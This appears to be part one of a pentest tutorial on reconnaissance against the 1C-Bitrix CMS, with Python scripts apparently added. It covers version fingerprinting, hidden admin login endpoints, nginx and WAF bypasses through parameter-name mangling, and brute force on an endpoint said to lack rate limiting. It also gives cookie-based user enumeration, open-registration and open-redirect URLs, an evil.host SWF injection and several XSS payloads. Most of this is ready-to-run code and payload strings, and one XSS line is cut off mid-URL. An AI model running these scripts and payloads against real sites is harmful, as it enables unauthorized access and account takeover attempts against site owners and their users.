This part details the key stages of Bitrix technical reconnaissance, explains the fundamental principles of the system, and shows how to identify starting points for potential attacks. The material will help you understand the logic behind the infrastructure, determine the platform version, investigate multisite setups, analyze the WAF configuration, and find the endpoints most often used by attack tools.
1C-Bitrix is one of the most popular (probably already the most popular) CMS in the CIS.
There are several editorial products:
Start
Standard
Small Business
Business
1C-Bitrix24
Online Store + CRM
All editions are built on a single code base with a standard set of functions, which is then extended with additional modules and components. Only the name changes and new functionality appears, naturally for your money.
If a vulnerability is found in the Start edition, it will most likely work just as well in the Business edition. The rule also applies to the CRM (Bitrix24), although there, going by the product specification, an authenticated user (albeit with minimal rights) is usually required, with rare exceptions.
BitrixVM deserves a separate mention: a pre-built virtual machine with automatic installation of any edition you choose, configured with system security and stability in mind. In some cases this changes the tactics of attacking the application, although in general the testing principles are not much different from a self-hosted installation.
Bitrix has its own proactive filter (WAF), which filters quite well and protects against most known web application attacks.
All user input passes through a multitude of recursive filters born of the fight against various vulnerability classes (XSS, LFI, SQLi). Besides plain pattern matching, they also perform reverse entity transformation, normalization, decoding and much more. Here you have to give it your all: the security module greatly complicates exploitation, and sometimes it kills good vulnerabilities outright.
The main drawback (and for some, a plus) is that the WAF does not work everywhere. This opens up opportunities for bypassing protection, which we will discuss in more detail later.
One installation can serve several domains and subdomains, which are most often placed in separate directories:
/var/www/html/ = site
/var/www/html/subdomain/ = subdomain.site
Part of the Bitrix structure in them is simply linked with symlinks.
Because of this, we sometimes get a detour:
http://site/bitrix/admin/ - 403
http://subdomain.site/bitrix/admin/ - 403
http://site/subdomain/bitrix/admin/ - 200
Now let’s look at the main techniques.
Unfortunately, there is no exact method for determining the version and edition of 1C-Bitrix from the outside. You have to rely on indirect signs, for example:
Presence/absence of specific modules and components
Unique paths to static files
Behavioral features specific to a particular code base
Release year, inferred from which static files are present (each file first shipped with the release of the year shown):
2021 => /bitrix/js/ui/vue/vue2/dev/src/bitrixvue.js
2020 => /bitrix/js/main/parambag/bundle.config.js
2019 => /bitrix/js/main/md5/bundle.config.js
2019 => /bitrix/js/main/usertype.js
2018 => /bitrix/js/main/gridtile/gridtile.min.js
2018 => /bitrix/js/main/pin/pin.js
2018 => /bitrix/js/main/core/core_webrtc.js
2017 => /bitrix/js/main/recorder/encoder.js
2017 => /bitrix/js/main/core/core_admin_interface.js
2016 => /bitrix/js/main/jquery/jquery-1.7.js
2016 => /bitrix/js/main/utils.js
2015 => /bitrix/js/main/rating_like.js
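To turn that table into a repeatable check, here is an added example (my code, not the article's or Bitrix's) that probes the marker files newest-first and reports a lower bound on the release year. The host https://TARGET.com is a placeholder; the `exists` callable is injectable so the logic can be run offline against a stub or through a proxied client.

```python
"""Estimate the 1C-Bitrix release year from which bundled static files exist (added example)."""
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional

# Year -> static file that first shipped with that year's release (the article's table).
YEAR_MARKERS = [
    (2021, "/bitrix/js/ui/vue/vue2/dev/src/bitrixvue.js"),
    (2020, "/bitrix/js/main/parambag/bundle.config.js"),
    (2019, "/bitrix/js/main/md5/bundle.config.js"),
    (2019, "/bitrix/js/main/usertype.js"),
    (2018, "/bitrix/js/main/gridtile/gridtile.min.js"),
    (2018, "/bitrix/js/main/pin/pin.js"),
    (2018, "/bitrix/js/main/core/core_webrtc.js"),
    (2017, "/bitrix/js/main/recorder/encoder.js"),
    (2017, "/bitrix/js/main/core/core_admin_interface.js"),
    (2016, "/bitrix/js/main/jquery/jquery-1.7.js"),
    (2016, "/bitrix/js/main/utils.js"),
    (2015, "/bitrix/js/main/rating_like.js"),
]


def http_exists(url: str, timeout: float = 10.0) -> bool:
    """True only for a 200 response; 403/404/5xx and network errors count as absent."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except (urllib.error.URLError, OSError):
        return False


def estimate_year(base_url: str, exists: Callable[[str], bool] = http_exists) -> Optional[int]:
    """Walk the markers newest-first and return the year of the first file found.

    A hit is a lower bound: a 2019 file means the code base is at least the 2019
    release. A miss on newer files does not prove an older version (the file may be
    blocked or its module not installed), so treat the result as "at least this year".
    """
    base = base_url.rstrip("/")
    for year, path in sorted(YEAR_MARKERS, key=lambda m: m[0], reverse=True):
        if exists(base + path):
            return year
    return None


def marker_report(base_url: str, exists: Callable[[str], bool] = http_exists) -> Dict[str, bool]:
    """{path: present} for every marker; gaps in the middle hint at blocked paths."""
    base = base_url.rstrip("/")
    return {path: exists(base + path) for _, path in YEAR_MARKERS}


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "https://TARGET.com"  # placeholder host
    print("release year >=", estimate_year(target))
    for path, present in marker_report(target).items():
        print("present" if present else "missing", path)
```

Run it against a target host as the only argument; the per-file report matters as much as the verdict, because a newer file that is missing while older ones answer 200 usually means a blocked path or a missing module rather than an older version.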
Looking for the authorization form? There it is.
There are many separate scripts that check access. Usually the script prolog_admin_before.php is responsible for this: wherever it is included, we get an authorization form, and a login/password pair submitted there is processed by the regular authentication flow.
Note that many administrators restrict access to /bitrix/admin/ in the web server rules.
But they do not know (or forget) that the attacker has a whole set of other login entry points:
/bitrix/admin/
/%62%69%74%72%69%78/./%61%64%6d%69%6e/index.php
/bitrix/components/bitrix/desktop/admin_settings.php
/bitrix/components/bitrix/map.yandex.search/settings/settings.php
/bitrix/components/bitrix/player/player_playlist_edit.php
/bitrix/tools/autosave.php
/bitrix/tools/get_catalog_menu.php
/bitrix/tools/upload.php
/bitrix/tools/catalog_export/yandex_detail.php
/bitrix/tools/sale/discount_reindex.php
/bitrix/tools/sale/basket_discount_convert.php
/bitrix/tools/seo_page_parser.php
/bitrix/tools/seo_google.php
/bitrix/tools/seo_yandex_direct.php
/bitrix/tools/seo_yandex.php
/bitrix/tools/clock_selector.php
/bitrix/modules/forum/install/admin/forum_index.php
/bitrix/modules/subscribe/public/subscr_edit.php
/bitrix/admin/main_controller.php
/bitrix/admin/php_command_line.php
/bitrix/components/bitrix/map.yandex.view/settings/settings.php
/bitrix/components/bitrix/map.google.view/settings/settings.php
/bitrix/components/bitrix/map.google.search/settings/settings.php
/bitrix/services/mobileapp/jn.php
/randombullchitgo/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
And there is no rate limiting on /bitrix/services/mobileapp/jn.php, so you can brute-force it without triggering lockouts.
By the way, PHP automatically renames dots, spaces and an unmatched [ in query parameter names to underscores, and a + in the query string decodes to a space before that. This lets you slip parameter names past some filtering at the web server or WAF level.
For example, access to the admin panel from the Internet is blocked in the nginx configuration, but Bitrix has a feature that lets you override the requested path via the SEF_APPLICATION_CUR_PAGE_URL parameter.
If you do this:
/randombullchitgo/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/
/randombullchitgo/?SEF.APPLICATION%20CUR+PAGE[URL=/bitrix/admin/
then you get additional endpoints with an authorization form.
And, of course, the search for admin entry points can be automated:
dirsearch -u "https://TARGET.com/bitrix/" -e php -w ~/bitrix-wordlist.txt --full-url --include-extensions=php --force-extensions -r -R 3 --filter "Status: 200" --filter "Size: >0" --filter-regex "Зарегистрироваться"
dirsearch -u "https://TARGET.com/bitrix/" -e php -w ~/bitrix-wordlist.txt --full-url --include-extensions=php --force-extensions -r -R 3 --filter "Status: 200" --filter "Size: >0" --filter-regex "Регистрация"
When you need to check a lot of Bitrix URLs in bulk and are too lazy to URL-encode each one by hand, you can configure Burp Suite to rewrite them automatically.
Go to the Proxy tab → Proxy Settings
At the bottom, find the Match and Replace Rules section
Add two new rules (type: Request first line, so that the Host header and the BITRIX_* cookies are left alone):
Rule 1:
Match: bitrix
Replace: %62%69%74%72%69%78/. (don't forget the trailing /. !)
✅ Regular expression
Rule 2:
Match: admin
Replace: %61%64%6d%69%6e
✅ Regular Expression
Don’t forget to check the boxes next to “Regex”.
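The three routes above (the per-subdomain directory from the multisite section, the percent-encoded /bitrix/admin/ spelling, and the mangled SEF_APPLICATION_CUR_PAGE_URL key) can be generated and probed from one script instead of a Burp rule. The following is an added example, not code from the article or from Bitrix. It assumes a login page contains the AUTH_FORM/USER_LOGIN field names or the Russian "Регистрация"/"Зарегистрироваться" strings (my assumption), keeps the article's /randombullchitgo/ path, and uses https://TARGET.com as a placeholder. The php_param_name helper is my emulation of PHP's query-key normalisation and is used to self-check every generated spelling before it is sent.

```python
"""Alternative routes to a blocked /bitrix/admin/ login form (added example)."""
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple
from urllib.parse import unquote_plus

ADMIN = "/bitrix/admin/"
SEF_PARAM = "SEF_APPLICATION_CUR_PAGE_URL"
# Assumed markers of a Bitrix login page: form field names plus the "Register" strings.
LOGIN_MARKERS = ("AUTH_FORM", "USER_LOGIN", "Регистрация", "Зарегистрироваться")


def php_param_name(decoded_key: str) -> str:
    """Emulate how PHP normalises a URL-decoded query key before storing it in $_GET:
    leading spaces dropped, '.' and ' ' become '_', an unmatched '[' becomes '_' and the
    remainder is kept verbatim. A matched '[...]' is an array index and is returned as-is."""
    name = decoded_key.lstrip(" ")
    out = []
    for i, ch in enumerate(name):
        if ch in " .":
            out.append("_")
        elif ch == "[":
            rest = name[i + 1:]
            return "".join(out) + ("[" if "]" in rest else "_") + rest
        else:
            out.append(ch)
    return "".join(out)


def sef_variants(target: str = ADMIN, prefix: str = "/randombullchitgo/") -> List[str]:
    """URLs whose query key PHP collapses back to SEF_PARAM, spelled to dodge naive matching.
    Each spelling is verified through php_param_name, so only working ones are returned."""
    last = SEF_PARAM.rfind("_")
    spellings = [
        SEF_PARAM,
        SEF_PARAM.replace("_", "%20"),                   # encoded spaces
        SEF_PARAM.replace("_", "."),                     # dots
        SEF_PARAM.replace("_", "+"),                     # '+' decodes to a space first
        SEF_PARAM[:last] + "[" + SEF_PARAM[last + 1:],   # unmatched '[' on the last '_'
        "SEF.APPLICATION%20CUR+PAGE[URL",                # the article's mixed spelling
    ]
    good = [s for s in spellings if php_param_name(unquote_plus(s)) == SEF_PARAM]
    return [f"{prefix}?{s}={target}" for s in good]


def encoded_path_variants(path: str = ADMIN + "index.php") -> List[str]:
    """Spellings of `path` with 'bitrix'/'admin' percent-encoded and '/./' inserted."""
    pct = lambda s: "".join("%%%02x" % ord(c) for c in s)
    combos = [(b, a, d) for b in (0, 1) for a in (0, 1) for d in (0, 1)][1:]  # skip plain path
    out = []
    for enc_bitrix, enc_admin, dot in combos:
        segs = []
        for s in path.split("/"):
            encode = (s == "bitrix" and enc_bitrix) or (s == "admin" and enc_admin)
            segs.append(pct(s) if encode else s)
            if s == "bitrix" and dot:
                segs.append(".")
        out.append("/".join(segs))
    return out


def multisite_candidates(hosts: List[str], scheme: str = "http") -> List[str]:
    """Guess per-site directories on the main host, one per subdomain label."""
    main = min(hosts, key=len)
    labels = [h[: -len(main) - 1] for h in hosts if h != main and h.endswith("." + main)]
    return [f"{scheme}://{main}/{label}{ADMIN}" for label in labels]


def http_fetch(url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """GET a URL and return (status, body); 4xx/5xx bodies are kept, network errors give 0."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return 0, ""


def probe(base: str, paths: List[str],
          fetch: Callable[[str], Tuple[int, str]] = http_fetch) -> Dict[str, Tuple[int, bool]]:
    """Return {path: (status, login_form_seen)} for every candidate path."""
    base = base.rstrip("/")
    results = {}
    for p in paths:
        status, body = fetch(base + p)
        results[p] = (status, status == 200 and any(m in body for m in LOGIN_MARKERS))
    return results


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "https://TARGET.com"  # placeholder host
    for path, (status, form) in probe(target, encoded_path_variants() + sef_variants()).items():
        print(status, "LOGIN FORM" if form else "-", path)
```

One caveat when reading the results: nginx decodes percent-escapes and collapses /./ before it matches a location, so the encoded spellings mainly help against filters that inspect the raw request line; the probe reports a status per spelling precisely so that you compare rather than assume.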
Some Bitrix endpoints expose the server's internal structure, file paths, module versions and other technical information. Here is a list of such endpoints:
/bitrix/tools/composite_data.php
/bitrix/components/bitrix/main.numerator.edit.sequence/slider.php
/bitrix/services/main/ajax.php
/bitrix/services/mobileapp/jn.php
/bitrix/modules/main/admin/php_command_line.php
/?USER_FIELD_MANAGER=1
/bitrix/admin/restore_export.php
/bitrix/admin/tools_index.php
/bitrix/bitrix.php
/bitrix/modules/main/ajax_tools.php
/bitrix/php_interface/after_connect_d7.php
/bitrix/themes/.default/.description.php
/bitrix/components/bitrix/main.ui.selector/templates/.default/template.php
/bitrix/components/bitrix/forum.user.profile.edit/templates/.default/interface.php
/bitrix/wizards/bitrix/demo/public_files/ru/personal/desktop.php
/bitrix/php_interface/dbquery_error.php
/bitrix/templates/.default/subscribe/subscr_form.php
A simple reflected content injection, good only for showing off your anime gif on someone else's site or adding a +1 low-severity finding to a pentest report. There is no way to take it any further.
/bitrix/components/bitrix/mobileapp.list/ajax.php?items[1][TITLE]=TEXT+INJECTION!+PLEASE+CLICK+HERE!&items[1][DETAIL_LINK]=http://google.com
/bitrix/tools/imagepg.php?img=//ceblog.s3.amazonaws.com/wp-content/uploads/2016/04/22110359/youve-been-hacked.png
/bitrix/templates/learning/js/swfpg.php?img=//evil.host/evil.swf
By default, there is nowhere to see a list of user logins. But this flaw lets you run through a wordlist and enumerate them: when a valid login is supplied, the application responds with a Set-Cookie header containing the string BITRIX_SM_UIDH=deleted:
GET /bitrix/tools/upload.php HTTP/1.1
Host: bitrix
User-Agent: Mozilla/5.0
Cookie: BITRIX_SM_UIDL=admin; BITRIX_SM_UIDH=1;
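Here is that check as an added example (not from the article or from Bitrix): for each candidate login it sends the cookie pair from the request above and keeps the logins whose response carries a Set-Cookie header wiping BITRIX_SM_UIDH. The wordlist and https://TARGET.com are placeholders, and the sending function is injectable so the decision logic can be exercised offline against constructed headers.

```python
"""Login enumeration through the BITRIX_SM_UIDL / BITRIX_SM_UIDH cookies (added example)."""
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Tuple

ENDPOINT = "/bitrix/tools/upload.php"   # the script from the request above
Headers = List[Tuple[str, str]]


def http_headers(url: str, cookie: str, timeout: float = 10.0) -> Headers:
    """Send one GET with the given Cookie header and return the response headers,
    also for 4xx/5xx answers: the Set-Cookie we care about is sent either way."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0", "Cookie": cookie})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return list(resp.headers.items())
    except urllib.error.HTTPError as e:
        return list(e.headers.items())
    except (urllib.error.URLError, OSError):
        return []


def login_exists(headers: Headers) -> bool:
    """True when the server wiped the hash cookie; per the article it only does so after
    the login in BITRIX_SM_UIDL matched a real user and the hash in BITRIX_SM_UIDH did not."""
    return any(name.lower() == "set-cookie" and "BITRIX_SM_UIDH=deleted" in value
               for name, value in headers)


def enumerate_logins(base: str, candidates: Iterable[str],
                     send: Callable[[str, str], Headers] = http_headers) -> List[str]:
    """Try each candidate login with a deliberately wrong hash; return the ones that exist."""
    url = base.rstrip("/") + ENDPOINT
    found = []
    for login in candidates:
        if login_exists(send(url, f"BITRIX_SM_UIDL={login}; BITRIX_SM_UIDH=1")):
            found.append(login)
    return found


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "https://TARGET.com"   # placeholder host
    wordlist = ["admin", "administrator", "manager", "test"]               # constructed sample
    print("valid logins:", enumerate_logins(target, wordlist))
```

Logins with characters that are not cookie-safe should be URL-encoded before being placed in BITRIX_SM_UIDL; the example keeps plain wordlist entries.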
If this doesn't work, in almost all Bitrix versions you can still enumerate users through the password-change form:
/bitrix/admin/index.php#change_password
If the user exists, the error message is different.
Sometimes you can get into the Bitrix admin panel simply by registering. Many sites have no registration button, but that doesn't stop us from calling the standard forms:
/auth/?register=yes
/crm/?register=yes
/auth/oauth2/?register=yes
/bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes
/bitrix/wizards/bitrix/demo/public_files/en/auth/index.php?register=yes
/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/custom-registration/index.php
/bitrix/wizards/bitrix/demo/modules/examples/public/language/en/examples/custom-registration/index.php
/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/my-components/news_list.php?register=yes
/bitrix/wizards/bitrix/demo/modules/examples/public/language/en/examples/my-components/news_list.php?register=yes
/bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subscr_edit.php?register=yes
/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/ru/personal/profile/index.php?register=yes
/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/en/personal/profile/index.php?register=yes
/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/ru/board/my/index.php?register=yes
/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/en/board/my/index.php?register=yes
/bitrix/wizards/bitrix/demo/indexes/ru/cancel/?register=yes
/bitrix/wizards/bitrix/demo/indexes/en/cancel/?register=yes
By the way, the forms themselves are not even required: it is enough to solve the captcha (if there is one) and send the POST request straight to the registration handler.
After registration (having obtained a valid session ID), you can browse the /bitrix/ directory.
It is hard to say why redirect.php is still in the product; the logic of that decision is unclear, and there is no point in delving into the developers' motivation.
/bitrix/redirect.php?goto=https://TARGET%252F:[email protected]/
/bitrix/rk.php?goto=https://TARGET%252F:[email protected]/
/bitrix/tools/track_mail_click.php?url=http://site%[email protected]/
/bitrix/redirect.php?goto=https://TARGET.com%252F:[email protected]/
It works mostly on older Bitrix versions, and even when it succeeds you will probably get a warning page first.
Trivial XSS; it can be used against authenticated users.
/bitrix/components/bitrix/map.google.view/settings/settings.php?arParams[API_KEY]=123'-'%00'-alert(document.domain)-'
/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00'}};alert(document.domain);if(1){//
/waf-bypass.php?page=BYPASS%00")});alert(1);$(document).ready(function%20(){%2f%2f
/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};top[%27a%27%2B%27lert%27](document.domain);if(1){//
/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_r
The first part of the Bitrix audit shows how much useful information can be gathered before moving on to more complex attacks. Even without exploits or a hunt for critical vulnerabilities, the platform reveals plenty of technical detail through the behavior of its own components, multisite quirks, weak authorization entry points and assorted service endpoints. It is these small but systemic flaws that lay the groundwork for further escalation of access.
Reconnaissance, WAF analysis, version determination, the search for hidden entry points and testing for XSS, SSRF and LFI form the foundation of a practical Bitrix pentest. Done correctly, these steps make the next stage, working with critical vulnerabilities and exploits, far more efficient and precise.
Next, in the second part, we will look at real attack tactics, RCE vulnerabilities, protection bypasses and methods of full system compromise.